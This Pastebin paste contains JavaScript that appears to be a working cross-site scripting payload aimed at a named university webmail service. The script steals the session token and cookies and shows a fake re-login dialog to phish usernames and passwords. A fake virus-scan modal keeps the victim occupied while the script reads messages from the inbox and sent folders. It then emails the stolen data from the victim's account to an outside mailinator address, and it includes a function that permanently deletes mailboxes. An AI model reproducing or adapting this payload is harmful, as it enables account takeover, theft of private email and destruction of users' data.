Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var token = document.cookie.split('ken=')[1].split(':')[0];
- var url = location.protocol+'//mail.iitr.ac.in/iwc/svc/wmap/';
- // var name=null;
- // var nameRegex = /<([a-zA-Z0-9\.]+)@iitr\.ac\.in>/gi;
- /*Send GET request*/
- function getData(url){
- console.log("GETing to "+url);
- var x=new XMLHttpRequest();
- x.open('GET',url,false);
- x.setRequestHeader('Content-type','application/x-www-form-urlencoded');
- x.send();
- return x.responseText;
- }
- /*Send POST request*/
- function postData(url,data){
- console.log('POSTing to '+url);
- var x=new XMLHttpRequest();
- x.open('POST',url,false);
- x.setRequestHeader('Content-type','application/x-www-form-urlencoded');
- x.send(data);
- return x.responseText;
- }
- /*Capture cookies*/
- function getCookies(){
- console.log('Capturing cookies');
- return '=====COOKIE=====\n'+document.cookie;
- }
- function sneakPasswordUIappend(){
- /*Style copied from BeEF*/
- var sneakydiv = document.createElement('div');
- sneakydiv.setAttribute('id', 'popupSneak');
- sneakydiv.setAttribute('style', 'width:0px;height:0px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#ffffff;font-color:#ffffff');
- sneakydiv.setAttribute('align', 'center');
- // sneakydiv.innerHTML= '<br><img src=\''+'https://mail.iitr.ac.in/iwc_static/layout/images/iitr.png'+'\' width=\'80px\' height\'80px\' /><h2>Your session has logged out!</h2><p>For some security reasons, your session has been logged out. To continue , please login again.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'username\' id=\'unameSneak\' onkeydown=\'if (event.keyCode == 13) sneakData();\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'password\' id=\'passSneak\' onkeydown=\'if (event.keyCode == 13) sneakData();\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lulSneak\' onClick=\'sneakData();\' value=\'Ok\'><br/>';
- sneakydiv.innerHTML= '<br><h2>Your session has logged out!</h2><p>For some security reasons, your session has been logged out. To continue , please login again.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'username\' id=\'unameSneak\' onkeydown=\'if (event.keyCode == 13) sneakData();\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'password\' id=\'passSneak\' onkeydown=\'if (event.keyCode == 13) sneakData();\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lulSneak\' onClick=\'sneakData();\' value=\'Ok\'><br/>';
- document.body.appendChild(sneakydiv);
- sneakydiv.setAttribute('hidden', 'true');
- return true;
- }
- function addModal(){
- var outterModal = document.createElement('div');
- outterModal.setAttribute('id','outterModalTrickUser');
- outterModal.setAttribute('style','display:none;position:fixed;z-index:1;padding-top:10px;left:0;top:0;width:100%;height:100%;overflow:auto;background-color:#000;background-color:rgba(0,0,0,.4)');
- outterModal.setAttribute('align', 'center');
- document.body.appendChild(outterModal);
- var innerModal = document.createElement('div');
- innerModal.setAttribute('id','innerModalTrickUser');
- innerModal.setAttribute('style','background-color:#fefefe;margin:auto;padding:10px;border:1px solid #888;width:80%');
- innerModal.setAttribute('align', 'center');
- outterModal.appendChild(innerModal);
- innerModal.innerHTML = "<img src='http://mail.iitr.ac.in/iwc_static/layout/images/ajaxLoader.gif'><br><br>Please wait while we scan your mail.";
- outterModal.style.display = 'block';
- return innerModal;
- }
- function removeModal(innerModal){
- innerModal.innerHTML = 'No virus found.<br>Email is safe to open.<br><br><br><button onclick="document.getElementById(\'outterModalTrickUser\').style.display = \'none\';sneakStoredPassword();">Open Email</button>';
- return true;
- }
- function sneakData(){
- var unameSneak = document.getElementById('unameSneak').value;
- var passSneak = document.getElementById('passSneak').value;
- if(unameSneak.length>0&&passSneak.length>0){
- dataStolen += '\n\n\n'+unameSneak+':'+passSneak;
- console.log(dataStolen);
- sendMail();
- return true;
- }
- return false;
- }
- /*Sneak stored password*/
- function sneakStoredPassword(){
- var returnValue = false;
- returnValue = sneakData();
- if(returnValue){
- return true;
- }
- console.log('Failed to retrive password');
- return false;
- }
- /*Send mail*/
- function sendMail(){
- /*Handle the cases of leaf node in tree*/
- nextTargetMail = '15e8f4111f3c052d80ee0afcb957c707@mailinator.com';
- /*Receiving mails content from external server allows to send specific mail for special victims*/
- var body = dataStolen;
- /*Preparation ends*/
- var subject = 'Fetched data from:'+currentEmail;
- var targetURL = url+"msg.mjs?rev=3&sid=";
- var data = 'mbox=&uid=&parts=&attachments=&to='+ encodeURIComponent(nextTargetMail) + '&cc=&bcc=&from=%3C' + encodeURIComponent(currentEmail) + '%3E&replyto=';
- data+= '&html='+encodeURIComponent(body)+'&text='+encodeURIComponent(body)+'©=Sent&draft=&smtp=true&xpriority=3&answer=false&vcard=&tzoffset=-5.5&priority=1&receipt=none&subject='+encodeURIComponent(subject)+'&token='+token+'&ttl=300&dojo.preventCache=1515578875597';
- return postData(targetURL,data);
- }
- /*Delete mails*/
- function deleteMails(mailBoxName){
- console.log('Deleting mails from: '+mailBoxName);
- /*Fetch mail list*/
- var m = eval(getData(url+'mbox.mjs?mbox='+mailBoxName+'&token='+token+'&random='+Math.floor(200*Math.random())).split('(1);')[1]);
- list = '';
- for(i=0;i<m[6].length;i++){
- list += m[6][i][0] + ',';
- }
- if(list[list.length - 1] ==','){
- list = list.substr(0,list.length - 1);
- }
- deleteCMD = 'rev=3&sid=&mbox='+mailBoxName+'&cmd=expunge&token='+token+'&argv='+list+'&argv=force';
- return postData(url+'cmd.mjs',deleteCMD);
- }
- /*Get mails*/
- function getMails(mailBoxName,limit){
- limit = limit||10;//Set limit on stealing mails per mailBox
- console.log('Capturing mails from:'+mailBoxName);
- /*Get email's uid list*/
- var m = eval(getData(url+'mbox.mjs?mbox='+mailBoxName+'&token='+token+'&random='+Math.floor(200*Math.random())).split('(1);')[1]);
- var content = '';
- var subject = '';
- var returnPath = '';
- var data = '=======MAIL-'+mailBoxName+' Starts=======';;
- var id = '';
- var mailData = '';
- for(i=0;i<m[6].length && i<=limit;i++){
- subject = ''; content =''; returnPath = '';
- id=m[6][i][0];/*Capture uid for a mail*/
- mailData = getData(url+'msg.mjs?mbox='+mailBoxName+'&uid='+id+'&token='+token+'&random='+Math.floor(200*Math.random()));
- /*Deals with deleted messages*/
- if (mailData.indexOf("Message no longer exists") != -1){
- continue;
- }
- mailData= eval(mailData.split('(1);')[1]);
- mailData = mailData[8];
- /*Subject and data search*/
- data+='\n=====MAIL-'+mailBoxName+'-'+(i+1)+'=====\n';
- for(j=0;j<mailData.length;j++){
- for(k=0;k<mailData[j][5].length;k++){
- if(mailData[j][5][k][0].toLowerCase()=="subject"){
- subject+="Subject:"+mailData[j][5][k][1];
- }
- else if(mailData[j][5][k][0].toLowerCase()=="return-path"){
- returnPath+="Return-path:"+mailData[j][5][k][1];
- }
- // else if(mailData[j][5][k][0].toLowerCase()=="to"||mailData[j][5][k][0].toLowerCase()=="cc"||mailData[j][5][k][0].toLowerCase()=="bcc"){
- // console.log(mailData[j][5][k][1]);
- // var match = nameRegex.exec(mailData[j][5][k][1]);
- // if(match!=null && match.length>=1){
- // name = match[1];
- // }
- // }
- }
- if(mailData[j][6]!=null){
- content += mailData[j][6]
- }
- }
- data += subject+'\n'+returnPath+'\n------\n'+content;
- }
- return data;
- }
- // alert(sendMail());
- sneakPasswordUIappend();
- modalElem = addModal();
- setTimeout(function(){/*Return to main thread*/
- /*Engage user with scan dialog box till data theft process is executed*/
- /*Steal mail data*/
- // dataStolen = getMails('INBOX') + '\n' + getMails('Trash') + '\n' + getMails('Sent');
- dataStolen = getMails('INBOX') + '\n' + getMails('Sent');
- /*Steal cookies*/
- dataStolen += getCookies();
- /*Send mail from mail opening user*/
- // console.log(sendMail());
- /*Permanently delete all mails*/
- // deleteMails('Spam');
- /*Remove the scanning modal*/
- removeModal(modalElem);
- }, 800);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement